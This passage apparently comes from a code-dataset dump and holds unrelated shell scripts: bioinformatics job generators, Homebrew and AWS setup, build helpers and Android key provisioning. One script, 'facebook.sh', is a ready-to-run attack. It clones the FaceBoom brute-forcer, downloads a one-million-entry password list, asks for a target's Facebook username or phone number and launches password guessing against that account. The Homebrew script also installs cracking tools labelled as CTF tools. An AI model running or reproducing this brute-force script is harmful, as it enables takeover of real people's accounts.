# awk, then runs FUSION.post_process.R, and submit it via the `sge` wrapper.
Rscript=/genetics/bin/Rscript.sh
sumstats=/genetics/bin/FUSION/tests/PGC2.SCZ.sumstats
mkdir $sumstats.tmp
cd $sumstats.tmp
ln -sf /genetics/bin/FUSION/tests/glist-hg19
for GTEx in $(/bin/cat /genetics/bin/FUSION/GTEx.list);do
for chr in $(seq 22); do
# The double-quoted string below is expanded NOW: $Rscript, $sumstats, $GTEx
# and ${chr} are baked into sge.sh.  NOTE(review): the backticks around
# /bin/awk are likewise executed at generation time, not inside the job, so
# N is computed before the .dat file is (re)written — confirm intended.
echo -e "#!/bin/bash\n\
$Rscript /genetics/bin/fusion_twas/FUSION.assoc_test.R \
--sumstats $sumstats \
--weights /genetics/bin/FUSION/GTEx/$GTEx.pos \
--weights_dir /genetics/bin/FUSION/GTEx \
--ref_ld_chr /genetics/bin/FUSION/LDREF/1000G.EUR. \
--chr ${chr} \
--out $sumstats.tmp/${GTEx}_${chr}.dat;\
N=`/bin/awk 'END{print FNR-1}' $sumstats.tmp/${GTEx}_${chr}.dat`;\
/bin/cat $sumstats.tmp/${GTEx}_${chr}.dat|\
/bin/awk -vN=$N -f /genetics/bin/TWAS-pipeline/gtex-fusion.awk > $sumstats.tmp/${GTEx}_${chr}.top;\
$Rscript /genetics/bin/fusion_twas/FUSION.post_process.R \
--sumstats $sumstats \
--input $sumstats.tmp/${GTEx}_${chr}.top \
--out $sumstats.tmp/${GTEx}_${chr}.top.analysis \
--ref_ld_chr /genetics/bin/FUSION/LDREF/1000G.EUR. --chr ${chr} --plot --locus_win 100000" > sge.sh
sge "sge.sh"
done
done
| true |
669ce63378cd874ba7d9fd3e73b14ed09b9e944b | Shell | alsvartr/atceph | /scripts/pimp-my-elevator.sh | UTF-8 | 525 | 3.203125 | 3 | [
"MIT"
] | permissive | #!/bin/bash
SSD_ELEVATOR="noop"
HDD_ELEVATOR="deadline"
for i in `ls /sys/block/`
do
elevator=`cat /sys/block/$i/queue/scheduler`
if [ "$elevator" == "none" ]; then
continue
fi
rotational=`cat /sys/block/$i/queue/rotational`
if [ "$rotational" == "0" ]; then
ELEVATOR=${SSD_ELEVATOR}
else
ELEVATOR=${HDD_ELEVATOR}
fi
echo $ELEVATOR > /sys/block/$i/queue/scheduler
echo "SET $ELEVATOR TO /dev/$i"
done
| true |
27ebf526a72aefbf0e2d3a3e973be46065b8eb2d | Shell | dphansen/macdotfiles | /brew.sh | UTF-8 | 5,816 | 2.875 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/usr/bin/env bash
# Install command-line tools using Homebrew.
# Ask for the administrator password upfront.
sudo -v
# Keep-alive: update existing `sudo` time stamp until the script has finished.
while true; do sudo -n true; sleep 60; kill -0 "$$" || exit; done 2>/dev/null &
# Check for Homebrew,
# Install if we don't have it
if test ! $(which brew); then
echo "Installing homebrew..."
ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)"
fi
# Make sure we’re using the latest Homebrew.
brew update
# Upgrade any already-installed formulae.
brew upgrade
# Install GNU core utilities (those that come with macOS are outdated).
# Don’t forget to add `$(brew --prefix coreutils)/libexec/gnubin` to `$PATH`.
brew install coreutils
# Install some other useful utilities like `sponge`.
brew install moreutils
# Install GNU `find`, `locate`, `updatedb`, and `xargs`, `g`-prefixed.
brew install findutils
# Install GNU `sed`, overwriting the built-in `sed`.
brew install gnu-sed --with-default-names
# Install Bash 4.
# Note: don’t forget to add `/usr/local/bin/bash` to `/etc/shells` before
# running `chsh`.
brew install bash
brew install bash-completion2
# Switch to using brew-installed bash as default shell
if ! fgrep -q '/usr/local/bin/bash' /etc/shells; then
echo '/usr/local/bin/bash' | sudo tee -a /etc/shells;
chsh -s /usr/local/bin/bash;
fi;
# Install `wget` with IRI support.
brew install wget --with-iri
# Install GnuPG to enable PGP-signing commits.
brew install gnupg
# Install more recent versions of some macOS tools.
brew install vim --with-override-system-vi
brew install grep
brew install openssh
brew install screen
brew install homebrew/php/php56 --with-gmp
brew install emacs
# Install font tools.
brew tap bramstein/webfonttools
brew install sfnt2woff
brew install sfnt2woff-zopfli
brew install woff2
# Install some CTF tools; see https://github.com/ctfs/write-ups.
brew install aircrack-ng
brew install bfg
brew install binutils
brew install binwalk
brew install cifer
brew install dex2jar
brew install dns2tcp
brew install fcrackzip
brew install foremost
brew install hashpump
brew install hydra
brew install john
brew install knock
brew install netpbm
brew install nmap
brew install pngcheck
brew install socat
brew install sqlmap
brew install tcpflow
brew install tcpreplay
brew install tcptrace
brew install ucspi-tcp # `tcpserver` etc.
brew install xpdf
brew install xz
brew install ipython
# Install other useful binaries.
brew install ack
#brew install exiv2
brew install git
brew install git-lfs
brew install imagemagick --with-webp
brew install lua
brew install lynx
brew install p7zip
brew install pigz
brew install pv
brew install rename
brew install rlwrap
brew install ssh-copy-id
brew install tree
brew install vbindiff
brew install zopfli
brew install rsync
brew install timemachineeditor
# Install Python
brew install python
brew install python3
# Install node.js
brew install node
# Install Cask
brew install caskroom/cask/brew-cask
brew tap caskroom/versions
brew tap caskroom/drivers
# Drivers
brew cask install logitech-options
# Core casks
#brew cask install --appdir="/Applications" alfred
#brew cask install --appdir="~/Applications" iterm2
brew cask install --appdir="~/Applications" java
brew cask install --appdir="~/Applications" xquartz
# Development tool casks
#brew cask install --appdir="/Applications" sublime-text
#brew cask install --appdir="/Applications" atom
#brew cask install --appdir="/Applications" virtualbox
#brew cask install --appdir="/Applications" vagrant
#brew cask install --appdir="/Applications" macdown
# Misc casks
#brew cask install --appdir="/Applications" google-chrome
#brew cask install --appdir="/Applications" firefoxdeveloperedition
brew cask install --appdir="/Applications" firefox
brew cask install --appdir="/Applications" skype
brew cask install --appdir="/Applications" slack
brew cask install --appdir="/Applications" dropbox
#brew cask install --appdir="/Applications" evernote
brew cask install --appdir="/Applications" 1password
#brew cask install --appdir="/Applications" gimp
#brew cask install --appdir="/Applications" inkscape
#brew cask install --appdir="/Applications" crashplan
#brew cask install --appdir="/Applications" freedome
brew cask install --appdir="/Applications" microsoft-office
brew cask install --appdir="/Applications" parallels
brew cask install --appdir="/Applications" spotify
brew cask install --appdir="/Applications" visual-studio-code
#brew cask install --appdir="/Applications" visual-studio
brew cask install --appdir="/Applications" vlc
brew cask install --appdir="/Applications" whatsapp
brew cask install --appdir="/Applications" mactex
brew cask install --appdir="/Applications" anaconda
brew cask install --appdir="/Applications" teamviewer
brew cask install --appdir="/Applications" github
brew cask install --appdir="/Applications" osxfuse
brew cask install --appdir="/Applications" cryptomator
#brew cask install --appdir="/Applications" joplin
#brew cask install --appdir="/Applications" zotero
brew cask install --appdir="/Applications" protonvpn
brew cask install --appdir="/Applications" grammarly
brew cask install --appdir="/Applications" prowritingaid
brew cask install --appdir="/Applications" istat-menus
brew cask install --appdir="/Applications" rsyncosx
brew cask install --appdir="/Applications" macs-fan-control
brew cask install --appdir="/Applications" caffeine
brew cask install borgbackup
# Install Docker, which requires virtualbox
#brew install docker
#brew install boot2docker
# Install the Adobe Creative Suite setup
brew cask install --appdir="/Applications" adobe-creative-cloud
# Remove outdated versions from the cellar.
brew cleanup
# Install tldr through npm
npm install -g tldr
| true |
a009b9bb07e8c5bdd187773f702cdf6fb6fd0fbe | Shell | dbertolini84/FnFast | /scripts/batchjobs_cov_loopSPT | UTF-8 | 468 | 2.8125 | 3 | [] | no_license | #!/bin/bash
# submission command: qsub [options] [executable] [arguments]
# -cwd: execute the job from the current working directory
# -b y: program is a binary file
# example:
# qsub -cwd -b y ./runFnFast_cov_loopSPT 0.1 0.1 37 test
# runs the job with k = kp = 0.1, seed = 37, base file name = "test"
# the program outputs the result to test_R37.dat
# loop over random seeds
for seed in $(seq 1 100)
do
# One job per seed at k = kp = 0.1; per the header comment above, each job
# writes its result to cov_loopSPT_0.1_0.1_R<seed>.dat
qsub -cwd -b y ./runFnFast_cov_loopSPT 0.1 0.1 ${seed} cov_loopSPT_0.1_0.1
done
| true |
764edbf4ab1abd13eade12b6a5ce4991456da735 | Shell | ivanviso/ASO | /Dificil.sh | UTF-8 | 1,504 | 3.625 | 4 | [] | no_license | # Declaramos funciones para evitar que nuestro parsing sea algo legible.
# Es una las
# Parse the global $tiempo ("HH:MM:SS") into the globals $horas, $minutos
# and $segundos, and store the total number of seconds in $segundosTotales.
function horasasegundos {
    # Scope IFS to the read so the shell's global IFS is left untouched.
    local campos
    IFS=":" read -r -a campos <<< "$tiempo"
    segundos=${campos[2]}
    minutos=${campos[1]}
    horas=${campos[0]}
    # 10# forces base-10 arithmetic: without it, zero-padded fields such as
    # "08" or "09" are parsed as octal and abort with
    # "value too great for base".
    segundosTotales=$(( 10#$segundos + 10#$minutos * 60 + 10#$horas * 3600 ))
}
# Format $1 (a number of seconds) into the globals $horas/$minutos/$segundos,
# each zero-padded to two digits so that e.g. 5 is rendered as "05".
function segundosahoras {
    printf -v segundos '%02d' $(( $1 % 60 ))
    printf -v minutos '%02d' $(( $1 / 60 % 60 ))
    printf -v horas '%02d' $(( $1 / 3600 ))
}
# Sort the per-user second totals into the global array $Ordenado in
# descending order.
function ordenar {
    # Scope IFS to the function so newline-splitting does not leak out.
    local IFS=$'\n'
    # -n is essential: the previous plain reverse sort was lexicographic and
    # ranked e.g. "900" above "10000".
    Ordenado=($(sort -rn <<<"${usuarioTiempoSegundos[*]}"))
}
declare -A usuarioTiempoSegundos # Associative arrays must be declared; otherwise bash
declare -A usuarioTiempoCadena # treats every textual subscript as [0] and merges all users.
# Read "name HH:MM:SS" records and accumulate the total seconds per user,
# keeping a pretty HH:MM:SS rendering of the running total as well.
while IFS=" " read -r nombre tiempo
do
    horasasegundos $tiempo
    usuarioTiempoSegundos[$nombre]=$((${usuarioTiempoSegundos[$nombre]} + $segundosTotales))
    segundosahoras ${usuarioTiempoSegundos[$nombre]}
    usuarioTiempoCadena[$nombre]=$horas:$minutos:$segundos
done < usuarios.txt
ordenar
# Print users in descending order of total time by matching every sorted
# seconds value back to its key.
# NOTE(review): if two users ever share the same total, each is printed once
# per matching position (O(n^2) lookup with duplicate hits) — confirm that
# totals are expected to be unique.
for i in "${Ordenado[@]}"
do
    for key in "${!usuarioTiempoCadena[@]}"
    do
        if [[ $i == ${usuarioTiempoSegundos[$key]} ]]
        then
            echo "$key => ${usuarioTiempoCadena[$key]}"
        fi
    done
done
| true |
52288cc778da3631bb3d800a9a7d24c434cfe5a3 | Shell | zycoder0day/ec2sisi | /auto.sh | UTF-8 | 8,681 | 3.609375 | 4 | [] | no_license | #!/bin/bash
## Networking
# . Create VPC
# . Create two subnets
# . Create IGW
# . Attach IGW to VPC
# . Create public route table, attached to VPC
# . Create route
# . Associate route table with both subnets
## Instances
# . Create SSH keys
# . Get Ubuntu image id
# . Create a specific security group for public instance (ingress port 80 tcp)
# . Create a locked down security group for private instance
# . Run IT instance with new first group above
# . Run Finance instance with second security group
## Elastic IP
# . Allocate Elastic IP
# . Associate Elastic IP with IT instance
## DONE
function createKeys () {
# param: name
keyname="$1"
echo "Creating keys..."
local raw=$(aws ec2 create-key-pair --key-name "$keyname" --output text --query KeyMaterial)
echo "$raw" > "$keyname".pem
echo "- Key created: ${keyname}.pem"
# aws ec2 create-key-pair --key-name <name>
}
function createVPC () {
# param: cidr block
echo "Creating VPC..."
local raw=$(aws ec2 create-vpc --cidr-block 10.0.0.0/16 --output text)
cvpc=$(echo "$raw" | grep "pending" | awk '{print $8}')
echo "- VPC ID: $cvpc"
# aws ec2 create-vpc --cidr-block <cidr block> --
# ex:
# aws ec2 create-vpc --cidr-block 10.0.0.0/16
}
function createSubnets () {
# param: vpc id, cidr block, az name
local vpcid="$1"
local pubcidr="10.0.1.0/24"
local privcidr="10.0.2.0/24"
local az="us-east-1d"
echo "Creating subnets..."
local subraw=$(aws ec2 create-subnet --vpc-id "$vpcid" --cidr-block "$pubcidr" --availability-zone "$az" --output text)
pubsub=$(echo "$subraw" | awk '{print $12}')
echo "- Public Subnet ID: $pubsub"
local subraw=$(aws ec2 create-subnet --vpc-id "$vpcid" --cidr-block "$privcidr" --availability-zone "$az" --output text)
privsub=$(echo "$subraw" | awk '{print $12}')
echo "- Private Subnet ID: $privsub"
# aws ec2 create-subnet --vpc-id <vpc-id> --cidr-block <cidr-block> --availability-zone <az-name>
# ex:
# aws ec2 create-subnet --vpc-id aea3a43eajhja --cidr-block 10.0.1.0/24 --availability-zone us-east-1d
}
function createIGW () {
  # Creates an Internet Gateway (not yet attached to any VPC).
  # Sets global: igw (the gateway id).
  echo "Creating Internet Gateway..."
  # --query replaces the fragile "awk '{print $2}'" column scraping.
  igw=$(aws ec2 create-internet-gateway \
          --query 'InternetGateway.InternetGatewayId' --output text)
  echo "- Internet Gateway: $igw"
}
function attachIGW () {
  # Attaches an Internet Gateway to a VPC.
  # $1: VPC id; $2: Internet Gateway id.
  local vpcid="$1"
  local igwid="$2"
  echo "Attaching Internet Gateway..."
  # attach-internet-gateway prints nothing on success, so check the exit
  # code instead of capturing unused output (the original stored it in a
  # 'local raw' that was never read, which also masked failures).
  if ! aws ec2 attach-internet-gateway --vpc-id "$vpcid" --internet-gateway-id "$igwid"; then
    echo "! Failed to attach $igwid to $vpcid" >&2
    return 1
  fi
  echo "- $igwid attached to $vpcid"
}
function createRouteTable () {
  # Creates a route table attached to the given VPC.
  # $1: VPC id. Sets global: routetable (the route table id).
  local vpcid="$1"
  echo "Creating route table..."
  # --query replaces the fragile "awk '{print $3}'" column scraping.
  routetable=$(aws ec2 create-route-table --vpc-id "$vpcid" \
                 --query 'RouteTable.RouteTableId' --output text)
  echo "- Route Table ID: $routetable"
}
function createRoute () {
  # Adds a default route (0.0.0.0/0) through the given Internet Gateway.
  # $1: route table id; $2: Internet Gateway id.
  # $3 was historically accepted as a VPC id but is not used by the API
  # call; it is still tolerated for call-site compatibility.
  local rtid="$1"
  local igwid="$2"
  echo "Creating route..."
  # Discard the JSON response to keep the terminal quiet, matching the
  # original (which captured it into an unused variable).
  aws ec2 create-route --route-table-id "$rtid" --gateway-id "$igwid" \
    --destination-cidr-block "0.0.0.0/0" > /dev/null
  echo "- Route created between Route Table $rtid and Internet Gateway $igwid"
}
function associateRoute () {
  # Associates the route table with both subnets (reads globals pubsub
  # and privsub set by createSubnets).
  # $1: route table id. Sets globals: assocrouteid, assocrouteid2.
  local rtid="$1"
  echo "Associating route with subnet..."
  # --query 'AssociationId' replaces the fragile awk column scraping.
  assocrouteid=$(aws ec2 associate-route-table --route-table-id "$rtid" \
                   --subnet-id "$pubsub" --query 'AssociationId' --output text)
  echo "- Route Table $rtid associated with Subnet $pubsub"
  assocrouteid2=$(aws ec2 associate-route-table --route-table-id "$rtid" \
                    --subnet-id "$privsub" --query 'AssociationId' --output text)
  echo "- Route Table $rtid associated with Subnet $privsub"
}
function getImage () {
  # Looks up the AMI id of the pinned Ubuntu 20.04 LTS image published by
  # Canonical and stores it in the global 'imageid'.
  echo "Fetching image id..."
  local canonical_owner="099720109477"
  local image_name="ubuntu/images/hvm-ssd/ubuntu-focal-20.04-amd64-server-20210223"
  imageid=$(aws ec2 describe-images --owner "$canonical_owner" \
              --query 'Images[*].[ImageId]' --output text \
              --filters "Name=architecture,Values=x86_64" \
                        "Name=name,Values=${image_name}")
  echo "- Image ID for Ubuntu 20.04: $imageid"
}
function createSG () {
  # Creates two security groups in the VPC (reads global cvpc):
  # one for the public-facing instance, one for the private instance.
  # Sets globals: pubsg, privsg (the group ids).
  echo "Creating security groups..:"
  # --query 'GroupId' replaces the fragile "awk '{print $1}'" scraping.
  pubsg=$(aws ec2 create-security-group --group-name "Public SG" \
            --description "SG for the public instances" --vpc-id "$cvpc" \
            --query 'GroupId' --output text)
  echo "- Public Security Group: $pubsg"
  privsg=$(aws ec2 create-security-group --group-name "Private SG" \
             --description "SG for the private instances" --vpc-id "$cvpc" \
             --query 'GroupId' --output text)
  echo "- Private Security Group: $privsg"
}
function createRules () {
	# Opens ingress TCP port 80 from anywhere (0.0.0.0/0) on the public
	# security group (reads global pubsg set by createSG). The private
	# group is intentionally left with no ingress rules ("locked down").
	echo "Modifying security group rules..."
	# public allow ingress port 80
	aws ec2 authorize-security-group-ingress --group-id "$pubsg" --protocol tcp --port 80 --cidr "0.0.0.0/0"
	echo "- Added ingress allow port 80 on $pubsg"
}
function runInstance () {
  # Launches one t2.micro in the public subnet and one in the private
  # subnet, both from the AMI in global 'imageid' using the key pair in
  # global 'keyname'. Sets globals: pubinstance, privinstance.
  echo "Creating instance..."
  # Assign the instance id directly; the original did a pointless
  # pubinstance=$(echo "$raw") round-trip through an intermediate variable.
  pubinstance=$(aws ec2 run-instances --image-id "$imageid" --count 1 \
                  --instance-type "t2.micro" --key-name "$keyname" \
                  --subnet-id "$pubsub" --security-group-ids "$pubsg" \
                  --output text --query "Instances[].InstanceId")
  echo "- Public Instance ID: $pubinstance"
  privinstance=$(aws ec2 run-instances --image-id "$imageid" --count 1 \
                   --instance-type "t2.micro" --key-name "$keyname" \
                   --subnet-id "$privsub" --security-group-ids "$privsg" \
                   --output text --query "Instances[].InstanceId")
  echo "- Private Instance ID: $privinstance"
}
function allocateElastic () {
  # Allocates a VPC-scoped Elastic IP in us-east-1.
  # Sets globals: allocationid, elasticip.
  echo "Allocating Elastic IP..."
  # Ask the API for exactly the two fields we need (tab-separated) and
  # read them in one go, instead of awk-scraping fixed columns from the
  # full text output, which breaks when the column order changes.
  read -r allocationid elasticip < <(aws ec2 allocate-address --domain vpc \
      --network-border-group us-east-1 \
      --query '[AllocationId,PublicIp]' --output text)
  echo "- Elastic IP: $elasticip allocated with id: $allocationid"
}
function associateElastic () {
  # Waits until the public instance is running, then attaches the Elastic
  # IP to it. Reads globals: pubinstance, allocationid, elasticip.
  echo "Associating Elastic IP with public instance..."
  # 'aws ec2 wait instance-running' polls describe-instances for us,
  # replacing the hand-rolled sleep loop (and its leftover assocdone /
  # alldone flag variables); it exits non-zero if the instance never
  # reaches the running state within the CLI's retry budget.
  echo "- Waiting for instance $pubinstance to reach 'running'..."
  aws ec2 wait instance-running --instance-ids "$pubinstance"
  aws ec2 associate-address --allocation-id "$allocationid" \
    --instance-id "$pubinstance" > /dev/null
  echo "- Instance $pubinstance associated with Elastic IP $elasticip"
}
### EXECUTE
# The steps below are order-dependent: each helper stores the id of the
# AWS resource it creates in a global variable (cvpc, pubsub, privsub,
# igw, routetable, keyname, imageid, pubsg, privsg, pubinstance, ...)
# that later steps consume.
## Create VPC
createVPC
## Create Subnets
createSubnets "$cvpc"
## Create IGW
createIGW
# Attach IGW
attachIGW "$cvpc" "$igw"
## Routing
# Create route table
createRouteTable "$cvpc"
# Create route
createRoute "$routetable" "$igw"
# Associate route with public subnet
# (associateRoute actually associates both subnets internally via the
# pubsub/privsub globals; the subnet argument is no longer passed.)
associateRoute "$routetable" #"$pubsub"
## Instances
# Keys
createKeys "cr8Uf5uEmL"
# Get Ubuntu Image
getImage
# Create security groups and apply rules
createSG
createRules
# Run instances
runInstance
## Elastic IP
# Allocate Elastic IP
allocateElastic
# Associate Elastic IP (blocks until the public instance is running)
associateElastic
### DONE
echo "DONE!"
| true |
c9f7b244f028344ef0be0c693abf448e8973e432 | Shell | coeka/hackiebox_cfw_ng | /arm-sdk/xpack-arm-none-eabi-gcc-10.2.1-1.1/distro-info/scripts/common-functions-source.sh | UTF-8 | 3,637 | 3.546875 | 4 | [
"Apache-2.0"
] | permissive | # -----------------------------------------------------------------------------
# This file is part of the xPacks distribution.
# (https://xpack.github.io)
# Copyright (c) 2019 Liviu Ionescu.
#
# Permission to use, copy, modify, and/or distribute this software
# for any purpose is hereby granted, under the terms of the MIT license.
# -----------------------------------------------------------------------------
# Helper script used in the second edition of the GNU MCU Eclipse build
# scripts. As the name implies, it should contain only functions and
# should be included with 'source' by the container build scripts.
# -----------------------------------------------------------------------------
#######################################
# Parses the host build command-line options into global configuration
# variables.
# Globals (written): ACTION, DO_BUILD_WIN, IS_DEBUG, IS_DEVELOP,
#   WITH_STRIP, IS_NATIVE, WITHOUT_MULTILIB, WITH_PDF, WITH_HTML,
#   WITH_NEWLIB_LTO, WITH_LIBS_LTO, WITH_TESTS, JOBS, TARGET_PLATFORM.
# Arguments: $1 - help message printed on --help; remaining args - options.
# Returns:   exits 0 on --help, exits 1 on an unknown option or when --win
#            is requested on a non-Linux host.
#######################################
function host_custom_options()
{
  local help_message="$1"
  shift

  ACTION=""

  DO_BUILD_WIN=""
  IS_DEBUG=""
  IS_DEVELOP=""
  WITH_STRIP="y"
  IS_NATIVE="y"
  WITHOUT_MULTILIB=""
  WITH_PDF="y"
  WITH_HTML="n"
  WITH_NEWLIB_LTO="n"
  WITH_LIBS_LTO="n"
  WITH_TESTS="y"

  JOBS="1"

  while [ $# -gt 0 ]
  do
    case "$1" in

      clean|cleanlibs|cleanall)
        ACTION="$1"
        ;;

      --win|--windows)
        DO_BUILD_WIN="y"
        ;;

      --debug)
        IS_DEBUG="y"
        ;;

      --develop)
        IS_DEVELOP="y"
        ;;

      --jobs)
        shift
        JOBS=$1
        ;;

      --help)
        echo
        echo "Build a local/native ${DISTRO_UC_NAME} ${APP_UC_NAME}."
        echo "Usage:"
        # Some of the options are processed by the container script.
        echo "${help_message}"
        echo
        exit 0
        ;;

      # --- specific

      --disable-multilib)
        WITHOUT_MULTILIB="y"
        ;;

      --without-pdf)
        WITH_PDF="n"
        ;;

      --with-pdf)
        WITH_PDF="y"
        ;;

      --without-html)
        WITH_HTML="n"
        ;;

      --with-html)
        WITH_HTML="y"
        ;;

      --disable-strip)
        WITH_STRIP="n"
        # Bug fix: removed the extra 'shift' that used to sit here; the
        # loop-end 'shift' already consumes this option, so the old inner
        # shift silently swallowed the *next* command-line argument.
        ;;

      --disable-tests)
        WITH_TESTS="n"
        # Bug fix: same double-shift removed here.
        ;;

      *)
        echo "Unknown action/option $1"
        exit 1
        ;;

    esac
    shift

  done

  if [ "${DO_BUILD_WIN}" == "y" ]
  then
    if [ "${HOST_NODE_PLATFORM}" == "linux" ]
    then
      TARGET_PLATFORM="win32"
    else
      echo "Windows cross builds are available only on GNU/Linux."
      exit 1
    fi
  fi
}
# -----------------------------------------------------------------------------
function add_linux_install_path()
{
  # Prepends the freshly built GNU/Linux toolchain's bin folder to PATH
  # and echoes the resulting PATH. Fails fast (non-zero exit from the
  # version check) if the cross compiler is not actually there.
  local toolchain_bin="${WORK_FOLDER_PATH}/${LINUX_INSTALL_RELATIVE_PATH}/${APP_LC_NAME}/bin"

  # Sanity check: the compiler must exist and be runnable.
  "${toolchain_bin}/${GCC_TARGET}-gcc" --version

  export PATH="${toolchain_bin}:${PATH}"
  echo ${PATH}
}
# -----------------------------------------------------------------------------
#######################################
# Computes the target library compile flags from the base optimization
# flags.
# Globals:   CFLAGS_OPTIMIZATIONS_FOR_TARGET (read), WITH_LIBS_LTO (read),
#            CFLAGS_FOR_TARGET, CXXFLAGS_FOR_TARGET (written)
# Arguments: $1 - "" for the full newlib (optimize for speed, keep
#            exceptions), "-nano" for newlib-nano (optimize for size,
#            disable exceptions).
#######################################
function define_flags_for_target()
{
  local optimize="${CFLAGS_OPTIMIZATIONS_FOR_TARGET}"
  if [ "$1" == "" ]
  then
    # For newlib, optimize for speed.
    optimize="$(echo ${optimize} | sed -e 's/-O[123]/-O2/g')"
    # Normally this is the default, but for just in case.
    optimize+=" -fexceptions"
  elif [ "$1" == "-nano" ]
  then
    # For newlib-nano optimize for size and disable exceptions.
    optimize="$(echo ${optimize} | sed -e 's/-O[123]/-Os/g')"
    # Bug fix: the original used the sed 'p' flag ('s/-Ofast/-Os/p')
    # without -n, which printed the substituted line a second time and
    # injected a duplicated copy of the flags into the result.
    optimize="$(echo ${optimize} | sed -e 's/-Ofast/-Os/g')"
    optimize+=" -fno-exceptions"
  fi

  # Note the intentional `-g`.
  CFLAGS_FOR_TARGET="${optimize} -g"
  CXXFLAGS_FOR_TARGET="${optimize} -g"
  if [ "${WITH_LIBS_LTO}" == "y" ]
  then
    CFLAGS_FOR_TARGET+=" -flto -ffat-lto-objects"
    CXXFLAGS_FOR_TARGET+=" -flto -ffat-lto-objects"
  fi
}
| true |
21fb49aee4e4e0d2ce4333cf445577f9b36e49bb | Shell | WorldBrain/Memex-Mobile | /write-android-keys.sh | UTF-8 | 1,341 | 3.140625 | 3 | [
"MIT"
] | permissive | #!/bin/sh
# Materializes Android build secrets from base64-encoded environment
# variables (CI-provided): SSH deploy key, app signing keystore, Google
# Play service account, Sentry properties, and the Firebase config.
# $1: "production" selects the production Firebase config; anything else
#     (or no argument) selects the dev config.
ENV_FILE="./app/android/app/google-services.json"
SERVICE_ACC_KEY="./app/android/service-account.json"
SIGN_KEY="./app/android/app/my-upload-key.keystore"
SENTRY_PROPS_FILE="./app/android/sentry.properties"
SSH_FILE="$HOME/.ssh/id_rsa"

# Make sure ~/.ssh exists before writing the key and the config into it
# (fresh CI containers may not have it yet).
mkdir -p "$HOME/.ssh"

# Set up private key. Quote every expansion so the base64 payload reaches
# the decoder intact (unquoted, any embedded whitespace would be mangled
# by word splitting).
echo "$IOS_REPO_PRIVATE_KEY" | base64 -d > "$SSH_FILE"
chmod 600 "$SSH_FILE"

# Set up Android app signing key
echo "$ANDROID_SIGN_KEY" | base64 -d > "$SIGN_KEY"
chmod 400 "$SIGN_KEY"

# Set up Google Play service account config
echo "$ANDROID_SERVICE_JSON" | base64 -d > "$SERVICE_ACC_KEY"
chmod 400 "$SERVICE_ACC_KEY"

# Set up sentry properties
echo "$SENTRY_PROPS" | base64 -d > "$SENTRY_PROPS_FILE"

# Set up Firebase env file.
# Quote and default $1: previously the unquoted test '[ $1 = "production" ]'
# produced a "unary operator expected" error whenever no argument was given.
if [ "${1:-}" = "production" ]; then
    echo "$ANDROID_APP_ENV" | base64 -d > "$ENV_FILE"
else
    echo "$ANDROID_APP_DEV_ENV" | base64 -d > "$ENV_FILE"
fi

# Enable SSH authentication
printf "%s\n" \
"Host gitlab.com" \
"  User git" \
"  IdentityFile $SSH_FILE" \
"  StrictHostKeyChecking no" \
"  CheckHostIP no" \
"  PasswordAuthentication no" \
"  LogLevel ERROR" \
"" \
"Host github.com" \
"  User git" \
"  IdentityFile $SSH_FILE" \
"  StrictHostKeyChecking no" \
"  CheckHostIP no" \
"  PasswordAuthentication no" \
"  LogLevel ERROR" >> ~/.ssh/config
| true |
1e8226de03fda16b24f9c10714e2bbad8ae2db6e | Shell | Gajendrsingh/facebook | /facebook.sh | UTF-8 | 1,230 | 2.71875 | 3 | [] | no_license | #!/bin/bash
echo "my facebook hacking script"
RED="\e[92m"
ENDCOLOR="\e[0m"
echo -e "${RED} ___--=--------___
/. \___\____ _, \_ /-\
/. . _______ __/=====@
\----/ | / \______/ \-/
_/ _/ o \
/ | o / ___ \
/ / o\\ | / O \ /| __-_
|o| o\\\ | \ \ /__--o/o___-_
| | \\\-_ \____ ---- o___-
|o| \_ \ /\______-o\_-
| \ _\ \ _/ / |
\o \_ _/ __/ /
\ \-/ _ /|_
\_ / | - \ |\
\____/ \ | / \ |\
| o | | \ |
| | | \ | \
/ | / \ \ \
/| \o|\--\ / o |\--\
\----------' \---------'${ENDCOLOR}"
apt update
apt install git python python3 wget -y
git clone https://github.com/Oseid/FaceBoom
cd FaceBoom
pip install mechanize
wget https://github.com/danielmiessler/SecLists/raw/master/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
RED="\e[31m"
ENDCOLOR="\e[0m"
bold=$(tput bold)
normal=$(tput sgr0)
echo -e "${RED}${bold}HELLO I AM KELIVN HER I AM FROM BLACK HAT Enter the user name/moblenumber/profilename${normal} ${ENDCOLOR}"
read a
python3 faceboom.py -t $a -w 10-million-password-list-top-1000000.txt
| true |
acbf531203b71a9692d247ef57902275af23c6a4 | Shell | wayneandlayne/KiCadMacOSPackaging | /update_install_translations.sh | UTF-8 | 621 | 3.296875 | 3 | [] | no_license | #!/bin/bash
# Fetches/updates the KiCad i18n repository, builds and installs the
# compiled translations, then copies them into the packaging support tree.
set -e
set -x

# Prefer Homebrew's gettext tools over any system-provided ones.
export PATH="/usr/local/opt/gettext/bin:$PATH"

BASE=$(pwd)   # starting directory (kept for debugging; not used below)
I18N_DIR=i18n
I18N_GIT=https://github.com/KiCad/kicad-i18n.git
I18N_BUILD=build-i18n

# Clone the translations repo on first run, otherwise fast-forward it.
if [ ! -d "$I18N_DIR" ]; then
    git clone "$I18N_GIT" "$I18N_DIR"
else
    cd "$I18N_DIR"
    git checkout master
    git pull
    cd -
fi

# Configure and install the translations into $I18N_BUILD/output,
# starting from a clean install tree each time.
mkdir -p "$I18N_BUILD"
cd "$I18N_BUILD"
rm -rf output
mkdir -p output
cmake -DCMAKE_INSTALL_PREFIX=output "../$I18N_DIR"
make install
cd -

# Refresh the copy bundled with the packaging support files.
if [ -d support/internat ]; then
    rm -r support/internat
fi
mkdir -p support/share
cp -r "$I18N_BUILD/output/share/kicad/internat" support/share/
| true |
1dce9cd06231e57170b9972e87cad70f6dc775c0 | Shell | fumikos/MSKCC | /mytools/run_aracne.sh | UTF-8 | 667 | 2.875 | 3 | [] | no_license | #!/bin/bash
# This program runs ARACNe-AP (https://sourceforge.net/p/aracne-ap/wiki/Home/)
# on the lung expression matrix, in three phases:
#   1. compute the mutual-information threshold (fixed seed, reproducible)
#   2. run 100 reproducible bootstrap networks
#   3. consolidate the bootstraps into the final network
# Requires: $DATA pointing at a directory containing expression_lung.txt
# and regulators.txt, and Aracne.jar in the current directory.
# (All $DATA expansions are quoted so paths with spaces survive intact.)

# Phase 1: calculate threshold with a fixed seed; saves into "outputFolder".
